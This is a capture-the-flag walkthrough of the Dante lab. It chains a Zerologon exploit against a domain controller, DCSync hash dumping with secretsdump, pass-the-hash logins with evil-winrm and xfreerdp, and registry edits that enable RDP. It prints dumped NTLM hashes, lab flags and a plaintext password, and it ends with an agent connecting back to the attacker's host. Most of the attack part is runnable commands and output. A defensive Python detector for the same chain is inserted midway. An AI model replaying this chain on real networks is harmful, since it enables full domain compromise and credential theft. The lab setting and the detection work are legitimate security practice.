
Activating the impacket virtualenv (zero)

jay ~/Documents/tools took 23ms
 source zero/bin/activate

Exploit

 python zer0dump.py 172.16.1.20 -target_machine=DC01
Namespace(target='172.16.1.20', silver=False, target_da=None, port=445, target_machine='DC01')
Performing authentication attempts...
172.16.1.20
DANTE-DC01
================================================================================================================================================
Success! DC can be fully compromised by a Zerologon attack.
 
NetrServerPasswordSet2Response
ReturnAuthenticator:
    Credential:
        Data:                            b'\x01v"\x8e\xa0^\xbc<'
    Timestamp:                       0
ErrorCode:                       0
Administrator:500:aad3b435b51404eeaad3b435b51404ee:9bff06fe611486579fb74037890fda96:::
aad3b435b51404eeaad3b435b51404ee:9bff06fe611486579fb74037890fda96
CRITICAL:root:SMB SessionError: STATUS_ACCOUNT_DISABLED(The referenced account is currently disabled and may not be logged on to.)

Problems

The results show that the Administrator account is disabled, so the dumped hash cannot be used to log in.

Exploit 2

Setting an empty password on the DC machine account

 
jay CVE-2020-1472 on master [1+] via 🐍 python v3.11.2 (zero) took 337ms
 python cve-2020-1472-exploit.py -t 172.16.1.20 -n DANTE-DC01
 _____                   __
/__  /  ___  _________  / /___  ____ _____  ____
  / /  / _ \/ ___/ __ \/ / __ \/ __ `/ __ \/ __ \
 / /__/  __/ /  / /_/ / / /_/ / /_/ / /_/ / / / /
/____/\___/_/   \____/_/\____/\__, /\____/_/ /_/
                             /____/
 
Checker & Exploit by VoidSec
 
Performing authentication attempts...
.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
[+] Success: Target is vulnerable!
[-] Do you want to continue and exploit the Zerologon vulnerability? [N]/y
y
[+] Success: Zerologon Exploit completed! DC's account password has been set to an empty string.
 

Dumping the secrets

jay impacket/examples on master [2+7?] via 🐍 python v3.11.2 (zero) took 21ms
 ./secretsdump.py -just-dc -no-pass 'DANTE.local/DANTE-DC01$@172.16.1.20'

Logging in

 
evil-winrm -i 172.16.1.20 -u 'katwamba' -H 14a71f9e65448d83e8c63d46355837c3 /domain:dante.local

Enable RDP

*Evil-WinRM* PS C:\Users\katwamba\Documents> Set-itemproperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\' -Name 'fDenyTSConnections' -value 0
*Evil-WinRM* PS C:\Users\katwamba\Documents> Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\' -Name 'UserAuthentication' -value 1
*Evil-WinRM* PS C:\Users\katwamba\Documents> Enable-NetFirewallRule -DisplayGroup 'Remote Desktop'
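Every step in this chain changes state on the DC and leaves a log trail: the Zerologon reset of the DC machine account shows up as Netlogon event 5829 and as Security 4742 on the DC computer account performed by ANONYMOUS LOGON, the secretsdump -just-dc run is a DCSync (Security 4662 carrying the DS-Replication-Get-Changes rights, here under the DC's own account but from a non-DC address), and the registry edits above are a Sysmon 13 value set on fDenyTSConnections. The detector below is an added example written for these notes, not part of the original page or of any of the tools used; the event field names follow Windows event data names, the sample records are constructed, and KNOWN_DC_ACCOUNTS / KNOWN_DC_IPS are assumptions about the lab.

```python
"""Detection for the chain in these notes (added example): Zerologon (5829 /
4742), DCSync by secretsdump (4662 correlated with the 4624 logon source) and
RDP enablement via the registry (Sysmon 13). Field names follow Windows event
data; all records below are constructed."""
from dataclasses import dataclass
from typing import Dict, List

# Well-known AD control-access-right GUIDs exercised by directory replication.
DS_REPL_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcf2"
DS_REPL_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcf2"

# Assumption for the example: the lab's domain controllers and their addresses.
KNOWN_DC_ACCOUNTS = {"DANTE-DC01$", "DANTE-DC02$"}
KNOWN_DC_IPS = {"172.16.1.20", "172.16.1.21"}
SYSMON = "Microsoft-Windows-Sysmon/Operational"


@dataclass(frozen=True)
class Alert:
    rule: str
    index: int   # position of the triggering record in the input
    detail: str


class Detector:
    def __init__(self) -> None:
        self.logon_source: Dict[str, str] = {}  # TargetLogonId -> IpAddress (4624)
        self.alerts: List[Alert] = []

    def process(self, index: int, ev: dict) -> None:
        chan, eid = ev["Channel"], ev["EventID"]
        # Remember where each logon session came from so 4662 can be tied to a host.
        if chan == "Security" and eid == 4624:
            self.logon_source[ev["TargetLogonId"]] = ev.get("IpAddress", "-")
        # Zerologon: DC accepted a vulnerable Netlogon secure channel ...
        elif chan == "System" and eid == 5829:
            self.alerts.append(Alert("zerologon", index,
                f"vulnerable Netlogon channel allowed for {ev.get('SamAccountName', '?')}"))
        # ... or a DC computer account was changed by ANONYMOUS LOGON (the password reset).
        elif (chan == "Security" and eid == 4742
              and ev.get("TargetUserName", "").endswith("$")
              and ev.get("SubjectUserName", "").upper() == "ANONYMOUS LOGON"):
            self.alerts.append(Alert("zerologon", index,
                f"computer account {ev['TargetUserName']} changed by ANONYMOUS LOGON"))
        # DCSync: replication rights used by a non-DC principal, or by a DC account
        # whose logon session did not originate from a DC (the secretsdump case above).
        elif chan == "Security" and eid == 4662:
            props = ev.get("Properties", "").lower()
            if DS_REPL_GET_CHANGES in props or DS_REPL_GET_CHANGES_ALL in props:
                subject = ev.get("SubjectUserName", "")
                src = self.logon_source.get(ev.get("SubjectLogonId", ""), "unknown")
                if subject not in KNOWN_DC_ACCOUNTS or src not in KNOWN_DC_IPS:
                    self.alerts.append(Alert("dcsync", index,
                        f"replication rights used by {subject} from {src}"))
        # RDP enablement: fDenyTSConnections set to 0 (Sysmon RegistryEvent, value set).
        elif chan == SYSMON and eid == 13:
            target = ev.get("TargetObject", "")
            if (target.lower().endswith(r"\terminal server\fdenytsconnections")
                    and ev.get("Details", "") == "DWORD (0x00000000)"):
                self.alerts.append(Alert("rdp_enabled", index,
                    f"{ev.get('Image', '?')} enabled RDP via {target}"))


def run(events: List[dict]) -> List[Alert]:
    det = Detector()
    for i, ev in enumerate(events):
        det.process(i, ev)
    return det.alerts


# Constructed sample records modelled on the steps in these notes.
SAMPLE_EVENTS = [
    {"Channel": "System", "EventID": 5829, "SamAccountName": "DANTE-DC01$"},
    {"Channel": "Security", "EventID": 4742, "TargetUserName": "DANTE-DC01$",
     "SubjectUserName": "ANONYMOUS LOGON"},
    {"Channel": "Security", "EventID": 4624, "TargetUserName": "DANTE-DC01$",
     "TargetLogonId": "0x3E7A1", "IpAddress": "10.10.14.4"},
    {"Channel": "Security", "EventID": 4662, "SubjectUserName": "DANTE-DC01$",
     "SubjectLogonId": "0x3E7A1", "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcf2}"},
    {"Channel": SYSMON, "EventID": 13, "Image": "C:\\Windows\\System32\\wsmprovhost.exe",
     "TargetObject": "HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\fDenyTSConnections",
     "Details": "DWORD (0x00000000)"},
    # Benign: DC02 replicating from a DC address, and a helpdesk user editing a workstation account.
    {"Channel": "Security", "EventID": 4624, "TargetUserName": "DANTE-DC02$",
     "TargetLogonId": "0x5B2C0", "IpAddress": "172.16.1.21"},
    {"Channel": "Security", "EventID": 4662, "SubjectUserName": "DANTE-DC02$",
     "SubjectLogonId": "0x5B2C0", "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcf2}"},
    {"Channel": "Security", "EventID": 4742, "TargetUserName": "WS01$",
     "SubjectUserName": "helpdesk"},
]

if __name__ == "__main__":
    for a in run(SAMPLE_EVENTS):
        print(f"[{a.rule}] record {a.index}: {a.detail}")
```

Run as a script it prints four alerts for the constructed input (two Zerologon indicators, the DCSync from 10.10.14.4, and the RDP registry change made from the WinRM host process) and stays quiet on the two benign records. The 4624 correlation is what makes the DCSync rule useful here: the replication request is made under the DC's own account, which would pass a plain allow-list, but the logon session behind it did not come from a DC address.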

xfreerdp

xfreerdp /u:katwamba /pth:14a71f9e65448d83e8c63d46355837c3 /v:172.16.1.20

Flag

 
*Evil-WinRM* PS C:\Users\katwamba\Desktop> cat flag.txt
DANTE{Feel1ng_Blu3_or_Zer0_f33lings?}
 
*Evil-WinRM* PS C:\Users\katwamba\Documents> net user mrb3n
User name                    mrb3n
Full Name                    mrb3n
Comment                      mrb3n was here. I used keep my password S3kur1ty2020! here but have since stopped.  DANTE{1_jusT_c@nt_st0p_d0ing_th1s}
Users comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never
 
Password last set            7/31/2020 4:43:25 PM
Password expires             1/27/2021 4:43:25 PM
Password changeable          7/31/2020 4:43:25 PM
Password required            Yes
User may change password     Yes
 
Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never
 
Logon hours allowed          All
 
Local Group Memberships
Global Group memberships     *Domain Users
The command completed successfully.

Connecting to DC02

./agent.exe -connect 10.10.14.4:11601 -ignore-cert